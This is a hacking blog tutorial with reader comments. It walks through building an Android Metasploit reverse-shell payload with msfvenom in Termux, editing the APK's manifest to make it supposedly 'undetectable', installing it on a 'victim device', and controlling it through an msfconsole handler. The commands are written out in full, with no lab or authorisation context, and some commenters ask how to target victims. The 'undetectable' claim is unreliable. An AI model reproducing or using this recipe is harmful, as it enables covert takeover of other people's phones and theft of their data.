Generate Undetectable Payload Of Metasploit In Termux (No Root)

Hello and welcome back friends we are come back with another excited tutorial in which we learn how to generate undetectable payload of metasploit in your termux without root. So without wasting more time let's get started.


Generating Normal Payload

So first of all you need to generate normal metasploit payload with msfvenom using given commands in your termux

$ msfvenom -p android/meterpreter/reverse_tcp lhost=(Ip address.) lport=(Port) R > Payload.apk

$ mv Payload.apk /sdcard

Now your payload is generated but you need to make it undetectable.

Making Undetectable Payload

Open apk editor pro and select you payload file and click on full edit and then decode all and  tap on mainfest file option and deleted some of the useless permissions given below.

  1. Make call
  2. Record Audio
  3. Write Contact
  4. Write Call log
  5. Write SMS
It's depend on you what permissions you need or not. Once you deleted permissions then click on build option building process is started. Now you have undetectable payload. Install it in victim device and exploit it using given commands.

MSF Console

Once your payload is installed in victim device then it's your time just use following commands in your terminal to exploit it.

$ msfconsole

$ use exploit/multi/handler

$ set payload android/meterpreter/reverse_tcp

$ set lhost (Ip address.)

$ set lport ( Port)

$ exploit

Now just normally type help command and proceed with your options.

I hop this information is helpful for you if you found something interesting then please make sure to follow us on instagram by pressing bell icon given at corner and if you have any question or suggestion for us then feel free to comment below. Thanks for reading have a nice day. Happy Hacking...!

Mohit Saran (Hacker's King) 

Post a Comment


  1. If the payload is hidden, how will the victim click on that?

    1. Hey! David nice question.When victim launch the application payload automatically started with app.

  2. Mind getting in touch with me, I want to learn thru private lessons.Although it would have to be zoom or Skype or Google cuz of our locations might not be similar or even remotely near.

    1. contact us on our Instagram handle @mohit_saran0

  3. When creating a normal payload, which ip address and port shoul I put there? Mine or victim's?!